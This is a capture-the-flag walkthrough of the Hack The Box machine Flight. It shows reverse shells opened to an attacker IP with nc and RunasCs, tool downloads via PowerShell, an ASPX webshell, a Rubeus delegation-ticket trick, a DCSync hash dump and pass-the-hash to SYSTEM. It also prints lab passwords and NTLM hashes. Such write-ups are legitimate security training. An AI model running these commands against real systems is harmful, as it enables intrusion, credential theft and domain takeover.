┌──(puck㉿kali)-[~/htb/flight] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.4] from (UNKNOWN) [10.10.11.187] 50027 Microsoft Windows [Version 10.0.17763.2989] (c) 2018 Microsoft Corporation. All rights reserved. C:\xampp\htdocs\school.flight.htb\styles>whoami whoami flight\svc_apache C:\xampp\htdocs\school.flight.htb\styles>
Shell as C.Bum
Enumeration
File System
As svc_apache, there’s not much I didn’t already have access to over SMB. The web directories sit at C:\xampp\htdocs, which is common for an XAMPP deployment on Windows.
There is an inetpub directory at the root of C:\. That’s the directory IIS typically runs from:
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 163B-E248
Directory of C:\
10/25/2022 06:22 PM <DIR> inetpub
06/07/2022 06:39 AM <DIR> PerfLogs
10/21/2022 11:49 AM <DIR> Program Files
07/20/2021 12:23 PM <DIR> Program Files (x86)
10/25/2022 05:49 PM <DIR> Shared
09/22/2022 12:28 PM <DIR> StorageReports
09/22/2022 01:16 PM <DIR> Users
10/21/2022 11:52 AM <DIR> Windows
09/22/2022 01:16 PM <DIR> xampp
0 File(s) 0 bytes
9 Dir(s) 15,360,438,272 bytes free
The wwwroot directory (the default server, kind of like html in /var/www with Apache on Linux) has the default stuff in it:
C:\inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is 163B-E248
Directory of C:\inetpub\wwwroot
09/22/2022 12:28 PM <DIR> .
09/22/2022 12:28 PM <DIR> ..
09/22/2022 12:28 PM <DIR> aspnet_client
09/22/2022 12:24 PM 703 iisstart.htm
09/22/2022 12:24 PM 99,710 iisstart.png
2 File(s) 100,413 bytes
3 Dir(s) 15,360,327,680 bytes free
But there is a development directory that looks to have a real website in it:
C:\inetpub\development>dir
Volume in drive C has no label.
Volume Serial Number is 163B-E248
Directory of C:\inetpub\development
10/25/2022 06:22 PM <DIR> .
10/25/2022 06:22 PM <DIR> ..
04/16/2018 02:23 PM 9,371 contact.html
10/25/2022 06:22 PM <DIR> css
10/25/2022 06:22 PM <DIR> fonts
10/25/2022 06:22 PM <DIR> img
04/16/2018 02:23 PM 45,949 index.html
10/25/2022 06:22 PM <DIR> js
2 File(s) 55,320 bytes
6 Dir(s) 15,360,327,680 bytes free
The development directory can be written to by C.Bum:
C:\inetpub>icacls development
development flight\C.Bum:(OI)(CI)(W)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
Network
Looking at the listening ports, there are a lot as is standard on any DC:
C:\xampp\htdocs\school.flight.htb\styles>netstat -ano | findstr LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 5328
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 968
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 5328
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 968
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2876
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
...[snip]...
I’m particularly interested in the ones that I can’t reach from my VM, like 8000 (maybe the development site?).
C.Bum
C.Bum is a member of the WebDevs group, but not the Remote Users group:
C:\>net user C.Bum
User name C.Bum
Full Name
Comment Senior Web Developer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/22/2022 1:08:22 PM
Password expires Never
Password changeable 9/23/2022 1:08:22 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/22/2022 2:50:24 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *WebDevs
The command completed successfully.
This means I can’t use WinRM to execute commands as C.Bum in PowerShell.
RunasCs
The RunasCs project aims to create a binary like runas.exe but without limitations:
- Allows explicit credentials
- Works both if spawned from interactive process and from service process
- Manage properly DACL for Window Stations and Desktop for the creation of the new process
- Uses more reliable create process functions like
CreateProcessAsUser()andCreateProcessWithTokenW()if the calling process holds the required privileges (automatic detection)- Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)
- Allows to bypass UAC when an administrator password is known (flag –bypass-uac)
- Allows redirecting stdin, stdout and stderr to a remote host
- It’s Open Source 🙂
It’s from one of the authors of the Potato exploits, and a really nice tool to have.
I’ll download the latest release, host it with a Python web server, and upload it to Flight:
C:\ProgramData>powershell -c wget 10.10.14.3:8000/RunasCs.exe -outfile r.exe
Now I’ll invoke a cmd.exe as C.Bun using -r to redirect STDIN/STDOUT to my host:
C:\ProgramData>.\r.exe C.Bum Tikkycoll_431012284 -r 10.10.14.3:443 cmd
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-5ea78$\Default
[+] Async process 'cmd' with pid 4508 created and left in background.
C:\ProgramData>
With nc listening on my box, there’s a connection:
┌──(puck㉿kali)-[~/htb/flight]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.187] 50043
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
flight\c.bum
C:\Windows\system32>
I can now get user.txt:
C:\Users\C.Bum\Desktop>type user.txt
45d7ff00d8e8********************
Shell as defaultapppoll
Enumeration
Tunnel
I’ll take a look at the development website. To do this, I’ll upload Chisel:
C:\ProgramData>powershell -c wget 10.10.14.3:8000/chisel.exe -outfile c.exe
Now I’ll start the server on my VM:
┌──(puck㉿kali)-[~/htb/flight] └─$ chisel server -p 8000 --reverse 2025/03/21 02:56:18 server: Reverse tunnelling enabled 2025/03/21 02:56:18 server: Fingerprint 30mcEyeiYU0qX9+F3KqwQ2z0ArRnPkDC3B+7iKM5i5s= 2025/03/21 02:56:18 server: Listening on http://0.0.0.0:8000
I use -p 8000 to listen on 8000 (the default port of 8080 is already in use by Burp), and give it --reverse to allow incoming connections to open listeners on my host that tunnel back through them.
I’ll connect from Flight, tunneling port 8001 on my host through the tunnel to 8000 on Flight:
c:\ProgramData>.\c client 10.10.14.3:8000 R:8001:127.0.0.1:8000
.\c client 10.10.14.3:8000 R:8001:127.0.0.1:8000
2025/03/20 18:57:10 client: Connecting to ws://10.10.14.3:8000
2025/03/20 18:57:10 client: Connected (Latency 10.1468ms)
Site
Visiting http://127.0.0.1:8001 in Firefox returns another site:
Nothing useful on the page. There’s a /contact.html that doesn’t have any useful information either.
Tech Stack
The response headers show that the site is hosted by IIS (rather than Apache):
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 16 Apr 2018 21:23:22 GMT
Accept-Ranges: bytes
ETag: "019c25c9d5d31:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Wed, 26 Oct 2022 01:47:57 GMT
Connection: close
Content-Length: 9371
They also show X-Powered-By: ASP.NET. Typically that means that .aspx type pages are in use.
WebShell
Write File
I’ll remember that C.Bum should have write access to this directory. I’ll test that out with a dummy file:
C:\inetpub\development>echo "test" > puck.txt
The text loads:
ASPX Echo
To see if ASPX code will run, I’ll create a silly ASPX file that writes a string, poc.aspx:
<% Response.Write("puck was here") %>
I’ll upload that over SMB, and then copy it into the development directory:
C:\inetpub\development>copy \xampp\htdocs\poc.aspx .
1 file(s) copied.
On visiting the page, it works:
.
Webshell
To run commands, I’ll download this aspx webshell from GitHub, upload it over SMB, and copy it into place:
c:\inetpub\development\development>powershell -c wget 10.10.14.3/cmd.aspx -outfile cmd.aspx
powershell -c wget 10.10.14.3/cmd.aspx -outfile cmd.aspx
powershell -c wget 10.10.14.3/cmd.aspx -outfile cmd.aspx
c:\inetpub\development\development>
Loading the page shows a form:
Clicking “Run” shows the output below:
.
Shell
My copy of nc64.exe has long been wiped by resets, but I’ll upload it back to \programdata,
c:\inetpub\development\development>powershell -c wget 10.10.14.3/nc64.exe -outfile c:\programdata\nc64.exe
and then execute it via the cmd.aspx webshell:
/c c:\programdata\nc64.exe 10.10.14.3 443 -e cmd
At my nc listener, I get a shell as defaultapppool:
┌──(puck㉿kali)-[~/htb] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.11.187] 51778 Microsoft Windows [Version 10.0.17763.2989] (c) 2018 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami iis apppool\defaultapppool c:\windows\system32\inetsrv>
Shell as administrator
Strategy
iis apppool\defaultapppool is a Microsoft Virtual Account. One thing about these accounts is that when they authenticate over the network, they do so as the machine account. For example, if I start responder and then try to open an SMB share on it (net use \\10.10.14.6\doesntmatter), the account I see trying to authenticate is flight\G0$:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.11.187
[SMB] NTLMv2-SSP Username : flight\G0$
[SMB] NTLMv2-SSP Hash : G0$::flight:1e589bf41238cf8e:547002306786919B6BB28F45BC6EEA4F:010100000000000080ADD9B1DBEAD801A1870276D7F4D729000000000200080052004F003500320001001E00570049004E002D00450046004B004A004B0059004500500037003900500004003400570049004E002D00450046004B004A004B005900450050003700390050002E0052004F00350032002E004C004F00430041004C000300140052004F00350032002E004C004F00430041004C000500140052004F00350032002E004C004F00430041004C000700080080ADD9B1DBEAD80106000400020000000800300030000000000000000000000000300000B1315E28BC96528147F3929B329DC4FE9D27ADEB96DF3BCF9F6C892CCB4443D80A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000
I won’t be able to crack that NetNTLMv2 because the machine accounts use long random passwords. But it does show that the defaultapppool account is authenticating as the machine account.
To abuse this, I’ll just ask the machine for a ticket for the machine account over the network. I showed this same attack as an unintended method in PivotAPI.
Get Ticket
Upload Rubeus
Rather than compile it myself, I’ll grab the latest compiled version of the binary from SharpCollection. I’ll host it with Python HTTP, and upload it to Flight:
c:\ProgramData>powershell wget 10.10.14.3:8000/Rubeus.exe -outfile rubeus.exe
Generate Ticket
To create a ticket, I’ll use the tgtdeleg command:
c:\ProgramData>.\rubeus.exe tgtdeleg /nowrap
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>cd c:\programdata
cd c:\programdata
c:\ProgramData>.\rubeus.exe tgtdeleg /nowrap
.\rubeus.exe tgtdeleg /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 0bDamHJs2SjKKtAP1mRuzqikYdtu2QKPe186mdGmuZY=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECmUGjzcbRS251O4bGQhhVU+GHvop38Uz8nMuzz17wzLwPwzsuTQVpAWadIo1vwjhsQwf5rbfodxKvfqAhtheuHJipS9xRvn7s7kXPNaRespxog61LVEOKBgh4KtS+oFh78+2G2X5MUFmHlKSCUaT1m+aRN64UiS49s+n+IhQhfOeCnhWSnt9b6pLo+IJ8tLhiGenlaMjqqWEtNbfNLOCviULWWj3KTN9ZQueXKioJs+paDemtT1XXq22kHt4A+vGKMcThrisuBBNbSyfV/MKH4Ln+ivenXOJNTbTJQU2Z5tGg8rIsyzVun1trPv1XGfjrIcMGdchR8CeNN4b1jJRXYaefxsU1jtSy5utvzFtuwEtlBSjZm1tD8ZAyAZbuJ1zqVz/Bc/W7LXSb1enRP6uATPqnwALsk/ZerKcsmYDBFHjBrNzdsUcaJV6dgQIMomwHQZ08pl5UmGE99H8qAi5Gsx7QMmieij4OQbN73UBsfP1tXyJXB3077c5Nl/HpKwZ17mn3BIFaptxKVukErC0qlm71183K/3ALJJ6UIO3aPLBjiukdkElMqAjjFwnrhDoaNr1APgAPtms1+i7ya/7b/zR6/jlLTbXwcZlK3dlgRhJJN/70HGPmNCYqzLnFe6pwrw48KstgUe+F30KeWuWyMApH/zko/AcwMOyJ6v9sn55knL+ixyAjL/PyssJBMPcITScGiw9FpIo0S4sQ5SJROBovYJpxADquHotNLhAum4dXpWXisg3inXFIV5QfD4xaD79wW+0yYi+PEKAyudLwd27XnlNAbcQfT2fX6L2yKPaB/eIYREoqFe35xXhJ685MvSmNt9b7VJmeDCzGEnVhfLrN/IB+4JL3H2/h6VlsY4PSaKBHoXCopxZSfTdX+wAD9COR2J8SyTzTe9VWkgfED2hED20Rdei5un7Sksx4QNyYxvVaEJCcDVJAZ/sfptgxRQ0A3VbdhJh6nKh5+Z/axxyzRgfkQem4Bqtjpgdc06WVLqUmOYZBVwyrsV1OUI33OCByuZcSZnpnrYsDjrCIA/HEOLJPFJyp8tcacL9xJYpPZ6RESHzWf7Lz7pGWIue2DMoXITzOnTxtBiJAm1Hya3Juqk0vC1yg9mqRC6ZNOwt0DfEGqfRBRcR5ryH/Wr6uoPVpAg3MKD2VYJoYuMua+FmdPFT9D4ItxVRY6bDS1RQN0mnhvLyhQjaSGoRvPvOGFAyv38aeMccegZaYseb5x52hX8GQxg82LCUjznZXubreDyeC3KrfxXpEb/46NevNyQmWFPP1Unas+isAkponCAXmJsSPon/nd719ZnEy6rYqwzDsnibOwlBHmxriS+Kp6UaDaqw7+lQBfjReQihtJFz0aTzquiczIQKo4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQgipnYnT3hLPnvxaegn6bto0XfXYgm0dnq3suao30wH8ChDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI1MDMyMTAyMzEwN1qmERgPMjAyNTAzMjExMjMxMDdapxEYDzIwMjUwMzI4MDIzMTA3WqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC
c:\ProgramData>
DCSync
Configure Kerberos Ticket
With a ticket for the machine account, I can do a DCSync attack, effectively telling the DC that I’d like to replicate all the information in it to myself. To do that, I’ll need to configure Kerberos on my VM to use the ticket I just dumped.
I’ll decode the base64 ticket and save it as ticket.kirbi. Then kirbi2ccache will convert it to the format needed by my Linux system:
┌──(puck㉿kali)-[~/htb/flight]
└─$ python3 kirbi2ccache.py
usage: kirbi2ccache.py [-h] [-v] kirbi ccache
kirbi2ccache.py: error: the following arguments are required: kirbi, ccache
┌──(puck㉿kali)-[~/htb/flight]
└─$ python3 kirbi2ccache.py ticket.kirbi ticket.ccache
INFO:root:Parsing kirbi file /home/puck/htb/flight/ticket.kirbi
INFO:root:Done!
Now I’ll export the environment variable to hold that ticket:
puck@kali$ export KRB5CCNAME=ticket.ccache
Time Issues
It’s really common when doing these kinds of attacks to run into time issues. When I run secretsdump.py from Impacket to dump all the hashes from the DC, it fails:
puck@kali$ impacket-secretsdump -k -no-pass g0.flight.htb
Impacket v0.10.1.dev1+20220720.103933.3c6713e - Copyright 2022 SecureAuth Corporation
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
It suggests adding -just-dc-user:
-just-dc-user USERNAME Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
I’ll go for administrator, but it still fails:
puck@kali$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.10.1.dev1+20220720.103933.3c6713e - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
Here’s the real issue – KRB_AP_ERR_SKEW.
Fix Time
I’ll fix the time with ntpdate, telling it to set my time to the NTP server on Flight:
puck@kali$ sudo ntpdate -s flight.htb
This will likely drop my VPN connection, but after reconnecting, I can dump the hashes:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nano ticket2.kirbi
┌──(puck㉿kali)-[~/htb/flight]
└─$ python3 kirbi2ccache.py ticket2.kirbi ticket2.ccache
INFO:root:Parsing kirbi file /home/puck/htb/flight/ticket2.kirbi
INFO:root:Done!
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: invalid principal syntax
[*] Cleaning up...
┌──(puck㉿kali)-[~/htb/flight]
└─$ export KRB5CCNAME=ticket2.ccache
┌──(puck㉿kali)-[~/htb/flight]
└─$ klist
Ticket cache: FILE:ticket2.ccache
Default principal: G0$@FLIGHT.HTB
Valid starting Expires Service principal
03/21/2025 03:31:07 03/21/2025 13:31:07 krbtgt/FLIGHT.HTB@FLIGHT.HTB
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...
┌──(puck㉿kali)-[~/htb/flight]
It works now without -just-dc-user as well:
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6a2b6ce4d7121e112aeacbc6bd499a7f:::
S.Moon:1602:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
R.Cold:1603:aad3b435b51404eeaad3b435b51404ee:5607f6eafc91b3506c622f70e7a77ce0:::
--snip--
G0$:aes256-cts-hmac-sha1-96:11ad9a25157bdc6e7fd9df6c0872c33d790f7660c6f5e6ea526996b808e4d7bb
G0$:aes128-cts-hmac-sha1-96:fa0d7c35e273ae2121d1e3c54b19c3cf
G0$:des-cbc-md5:463d9edadc20e308
[*] Cleaning up...
┌──(puck㉿kali)-[~/htb/flight]
..
Shell
Those hashes work for a pass the hash attack:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u administrator -H aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\administrator:43bbfc530bab76141b12c8446e30c17c (Pwn3d!)
Itshows Pwn3d! because the creds are good and this is an administrator account.psexec.py works to get a shell from here:
┌──(puck㉿kali)-[~/htb/flight] └─$ impacket-psexec administrator@flight.htb -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on flight.htb..... [*] Found writable share ADMIN$ [*] Uploading file FQixGuoG.exe [*] Opening SVCManager on flight.htb..... [*] Creating service dYER on flight.htb..... [*] Starting service dYER..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.2989] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system C:\Windows\system32> hostname g0 C:\Windows\system32>
.
That was Fun 🙂
Beyond root
xfreerdp /v:10.10.11.187:3389 /u:puck /p:Start123! /w:1566 /h:968n
after reboot, repeating every minute a schedulded task is runned: powershell.exe -c “C:\users\administrator\contacts\trigger.ps1”
trigger.ps1 contains:
$pattern = "([0-9]{1,3}\.){3}[0-9]{1,3}"
$ips = @()
if (test-path -path C:\shared\*.ini){
gc C:\Shared\*.ini| % {
if (($_ -match $pattern)) {
$ips += [regex]::Match($_, $pattern).Value
}
}
}
foreach ($ip in $ips){
net use * \\$ip\aa /user:flight.htb\c.bum Tikkycoll_431012284
}
$DateToDelete = (get-date).AddMinutes(-2)
Get-ChildItem C:\shared | Where-Object { $_.LastWriteTime -lt $DatetoDelete } | Remove-Item
.
also after reboot, repeating every 5 minutes a schedulded task is runned: powershell.exe -c “C:\users\administrator\contacts\wipe.ps1
wipe.ps1 contains:
Remove-Item "C:\xampp\htdocs\*" -Recurse -Force -Confirm:$false Copy-Item -Path "C:\users\administrator\videos\flight.htb" -Destination "C:\xampp\htdocs\" -Recurse Copy-Item -Path "C:\users\administrator\videos\school.flight.htb" -Destination "C:\xampp\htdocs\" -Recurse Remove-Item "C:\inetpub\development" -Recurse -Force -Confirm:$false Copy-Item -path "C:\users\administrator\videos\development" -Destination "C:\inetpub\development\" -recurse cmd /c 'icacls "C:\inetpub\development" /grant flight.htb\c.bum:(OI)(CI)W /T'